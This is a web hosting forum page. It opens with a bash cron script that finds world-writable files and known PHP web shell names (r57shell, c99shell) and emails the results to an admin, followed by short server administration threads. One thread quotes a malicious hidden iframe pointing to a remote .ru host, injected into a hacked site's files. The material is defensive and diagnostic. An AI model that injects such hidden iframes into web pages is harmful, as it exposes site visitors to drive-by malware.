Simple Script To Find Suspected Files And Folders
Sep 1, 2007
Try this useful script to find all 777 permission files and folders in /home directory
also it can find all names of suspected folders and files you want
and then you can take the required action
to install this follow the steps
login as root
Code:
cd /root
Code:
pico checkpandnscript.sh
Enter this code and in the 5th line from the end change
email@email.com to your email
Code:
# This file will help you to find suspected folders and files in /home directory
# Coded and desgined by Alrutani Web Hosting www.alrutani.com , for more informations please contact us.
#!/bin/sh
echo " " > /root/perdfmbc
echo "################# Folders with 777 permission #################" >> /root/perdfmbc
echo " " >> /root/perdfmbc
find /home -type d -perm 777 |egrep -v "./cpapachebuild|./.cpan|./src" >> /root/perdfmbc
echo " " >> /root/perdfmbc
echo "################## Files with 777 permission ##################" >> /root/perdfmbc
echo " " >> /root/perdfmbc
find /home -type f -perm 777 >> /root/perdfmbc
echo " " >> /root/perdfmbc
echo "############### Folders & files must be checked ###############" >> /root/perdfmbc
echo " " >> /root/perdfmbc
find /home -name forum >> /root/perdfmbc
find /home -name upload >> /root/perdfmbc
find /home -name 4images >> /root/perdfmbc
find /home -name gallery >> /root/perdfmbc
find /home -name uploader >> /root/perdfmbc
find /home -name up >> /root/perdfmbc
find /home -name r57shell >> /root/perdfmbc
find /home -name r57shell.php >> /root/perdfmbc
find /home -name r57.php >> /root/perdfmbc
find /home -name c99shell >> /root/perdfmbc
find /home -name c99shell.php >> /root/perdfmbc
find /home -name c99.php >> /root/perdfmbc
find /home -name shell.php >> /root/perdfmbc
echo " " >> /root/perdfmbc
echo "###############################################################" >> /root/perdfmbc
echo "Developed by Alrutani Web Hosting http://www.alrutani.com" >> /root/perdfmbc
echo "For more informations please contact us." >> /root/perdfmbc
echo " " >> /root/perdfmbc
cat /root/perdfmbc | mail -s "Suspected files & folders in your server" email@email.com
cd /root
rm -rf perdfmbc
# This file will help you to find suspected folders and files in /home directory
# Coded and desgined by Alrutani Web Hosting www.alrutani.com , for more informations please contact us.
To add more files and folders that you want the system to list
fine
Code:
find /home -name upload >> /root/perdfmbc
after it add
Code:
find /home -name xxxxxx >> /root/perdfmbc
where xxxxx is the name of the file or the folder you want
Save file Ctrl X
select yes then click enter
Code:
chmod 755 checkpandnscript.sh
To make the script works daily
Code:
crontab -e
At the end enter
Code:
* 3 * * * sh /root/checkpandnscript.sh
save and exit done !!
now to test the script
Code:
cd /root
Code:
sh checkpandnscript.sh
you will receive email from the server
View 2 Replies
ADVERTISEMENT
Feb 22, 2008
I'd like to know how to secure an SMF site. Is the default permission good enough?
View 4 Replies
View Related
Mar 5, 2014
I have just discovered in my access log some people accessing urls like this:
domain.com/index.php/index.php/ or even
domain.com/index.php/index.php/index.php
I have opened those links in browser and they worked. Why?
My .htaccess is empty and I have no 'index.php' folder. But I do have 'index.php' file.
I think this is happening to most php sites, not just mine. This is a random example:
[URL] ....
My question is how to force apache to return 404 error when such url is accessed?
View 1 Replies
View Related
Jul 13, 2008
Something weird happening here. I have tried every string possible...
There are a number of folders I want to remove off my server, tried the good old and simple...
rm -r /folder/
And then went and ended up with a string as long as my screen. No matter what I do, as it goes recursive in to the directory it asks me if I want to remove each file individually. No matter what string or action I take it insists on asking me as it goes to delete each file.
Could this be a configuration option in CentOS?
View 3 Replies
View Related
Jun 3, 2009
I'm currently using (amongst other backup systems) rsync to an offsite space (am using BQBackup at the moment)
I'm just wondering - apart from backing up all of /home/, /var/lib/mysql/ and the important config files (httpd.conf, php.conf, etc etc) is there anything else that *needs* to be backed up?
Obviously in a worst case scenario, a new machine would be deployed with a fresh OS install (and a fresh WHM/cPanel install) so I wouldn't worry about backing up OS files or cPanel core files, although I'm wondering if there's anything apart from the /home/ directory and the MySQL databases which would be lost (and so need backing up) in the event of a crash?
View 10 Replies
View Related
Aug 7, 2014
If users copy files/folders on Plesk Panel 11/12 with attribute "read-only", I don't see this attribute on File Manager, every time do next "attrib -r <path to file/folder".
Maybe you can improve functionality of "File Manager" on Plesk Panel 12?
View 1 Replies
View Related
Feb 20, 2015
I have a concern during the installation of PrestaShop. I created a subdomain through Plesk, put my files on my server via FTP. During installation of PrestaShop, I have a problem:
Recursive write permissions for the Apache user on the ~ / config /
My user is "NOWIS" and my group is "psacln" ....
I think the user "NOWIS" has no rights as "Apache" ....
View 3 Replies
View Related
Jun 6, 2008
we've been having issues with reaching or exceeding our disk quotas. I've checked carefully, and while I've cleared our mail queue's, I don't think that's the issue.
So what I'm really looking for is a way to figure out why we have so many files (our quota is 220000, and I'm pretty confident that we aren't intentionally doing anything to create so many files). There's lots of information on finding the folders with the largest file sizes, but locating the folders with the greatest number of files isn't quite so simple--or at least, it doesn't seem very clear to me.
Does anyone know a way via the command line to figure out this information, short of going through every single folder and figuring out how many files are in the specific folder?
View 6 Replies
View Related
Jun 23, 2014
I have the following problem, the files and folders generated by PHP are hidden in FTP.
I can see in the Plesk file manager that users, permissions and groups are the same for all files and folders (those that can be seen and those that cannot be seen from FTP).
All the options in the server are set by default. It is a new installation of Plesk 12.0.18 #4 in CentOS 6.5 (Final).
SO: CentOS 6.5 (Final)
Plesk: 12.0.18 #4
PHP: FasctCGI
Apache Modules:
View 3 Replies
View Related
Jul 10, 2009
My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
/iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
View 14 Replies
View Related
Mar 27, 2009
I have a dedicated server, the server itself is secure (as far as I know) and I run lots of my sites from it. I offered a friend hosting for his flash based chat application he built.
Today I was contacted by someone; "Are you the owner of xxxx.net?" so I informed that yes, it was my server and they then showed me an email they'd received from my server. I did a search and apparently someone uploaded mail.php and a couple of files it was using to send out spam based upon a variety of conditions that the other files met. The files contained forenames and surnames, it'd use a forename and a surname then send it to popular free mail services. The email contained ramblings about new world order and promoted a website.
How can I find out how they got the files uploaded to the account and what action can I take? I checked the whois for the domain and have their contact information, however it's a large site so I'm doubtful that the owner did it. I don't want my servers IPs being blacklisted for spam :|
View 3 Replies
View Related
Apr 23, 2009
Is there a way to get Apache to tell me which .conf file it is loading at start-up?
There's a box that's misbehaving and Apache is running on port 80 and 8080 on the box... but we can't locate *why* it's running on port 8080. I can't find any Listen 8080 statement in the typical config files. If I knew which config files it was loading, I could go through all of the files in more detail.
View 4 Replies
View Related
Nov 15, 2007
Domain abc.com hosted on my server
I fount out that domain def.com is identical to abc.com (ie: same content, same code etc...) but it is NOT hosted on my server
However both domain point to the same IP which is on my server
How is it even possible? was the account/server compromised?
View 14 Replies
View Related
Dec 4, 2008
On one of my servers i can't CHMOD 777 Files, but i can CHMOD 777 Folders.
Files are chmod 777 but on scripts installation... It's Said Please Chmod Example.php to 777
Centos 5
PHP 5
Apache 2.2.3
View 11 Replies
View Related
Apr 28, 2009
I have an odd problem... after transferring several hundred .php files to one of our servers we noticed that the browser was showing "?" output only.
When I open the file in "vi" (we're running centos 5.x), I can see this at the end of the file:
Code:
...
</HTML>
^@^@<?php //comment goes here ?>
-------------
I highlighted in red bold the problem text. If these four characters are removed from the file (edited out manually using vi) then the file displays and works correctly.
However.. there are several hundred of these files, and some have the problem and some don't.
I've tried everything I know to find which files contain the problem, but so far no luck.
ie:
grep -r "^@" .;
grep -r "^@" .;
Basically.. I need to find any instance of these characters and then remove them.
View 3 Replies
View Related
Apr 14, 2007
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How can I find their doorway?
View 4 Replies
View Related
Oct 15, 2007
how can i do a search for all files (probs using regex) of files consisting purely of numbers?
for e.g. find:
53243.php
24353.php
24098.php
(always have 5 numbers).
seems one of my accounts has had some script run which generated a bunch of these in various subfolders, and the php file basically does a callback to www3.rssnews.ws and www3.xmldata.info, which seem to be some sort of spyware servers.
View 10 Replies
View Related
May 30, 2009
anybody have any experience with SimpleCDN. We are considering using their Hurricane service to stream our media.
View 4 Replies
View Related
May 27, 2009
Because i have couple site hosted by both hosting company (DTH=downtownhost and TCH=totalchoicehosting) and have positive experience with them i needed to make decision who will be hoster for my new project.
The problem was by both company and by 99% others that traceroute command is not enabled by default and it is essential for my new project.
After exchanging a couple emails with both companies DTH was winner again because DTH allow on shared hosting traceroute command (in situation that you need it).
Answer from TCH was that only on VPS (semi-dedicated) is traceroute command possible and not on shared envirovment.
I must again praise DTH for the way how they handle with their customers and that they are ready to do everything for their customers. Not wonder that they are one of the greatest hosting company.
View 10 Replies
View Related
Aug 29, 2008
where I can get a simple SSL certificate for my web hosting business? So my customers feel safe on submitting their information. Is the standard SSL from GoDaddy pretty good?
View 14 Replies
View Related
Jan 23, 2007
So I was trying to run a backup process in Plesk 8.1 and the whole panel froze up on me (it's happened numerous times before).
Anyway, since the panel was all frozen up I just went into SSH and did a simple "reboot" (also, as done before many times). Only problem is, this time after I did the reboot the server never actually came back online... it seems to be locked up or something, I have no idea what.
I called my host and they are looking into it but they have no idea what's going on either and it's taking them forever to figure it out all the meanwhile my sites are down.... this isn't good.
Does anyone have any suggestions or advice as to why this could be occuring?
View 2 Replies
View Related
Sep 4, 2007
I have an ssl issued from my domain company and i have hosting in another company.
I have created an CSR with my hosting, submitted to mine domain company so i can have the ssl, and installed in my hosting company.
But now i want to change mine hosting because the hosting company doesn't accept chained certificates..
So if i change mine hosting i could mantain mine old ssl ? or what does i need to do?
View 6 Replies
View Related
Jul 24, 2007
using ftp via unix command, how do you get all files and sub directories?
get *.*? but will that get sub dir?
btw, how do you get it to switch between ascii and binary for images? does it do that automaticly?
View 1 Replies
View Related
Jun 12, 2007
Can you see if my site will load for you:
[url]
Then (if it loads) post the stats from the bottom of the page:
Page creation time: (Numbers)
And:
Your Os:
Your Browser:
Some people say my site won't load or is loading slowly for them, but I have no one to test it, thanks. If possible, I need quite a few tests.
View 4 Replies
View Related
Oct 3, 2007
We are looking at this software. Seems easy enough, secure enough.
Experiences with Simple DNS Plus?
View 2 Replies
View Related
May 21, 2009
when I get a server it comes with cPanel and I don't have to do much to get it going, but this time I don't need all the bells and whistles. What should I do to get a server with only CentOS to start running a pretty simple web server that just listens on whatever ip? I just want it to run php,mysql, and a web server which I know how to setup already. What I want to know is what else is necessary to setup? Resolvers, the hostname, bind, named, etc?
View 2 Replies
View Related
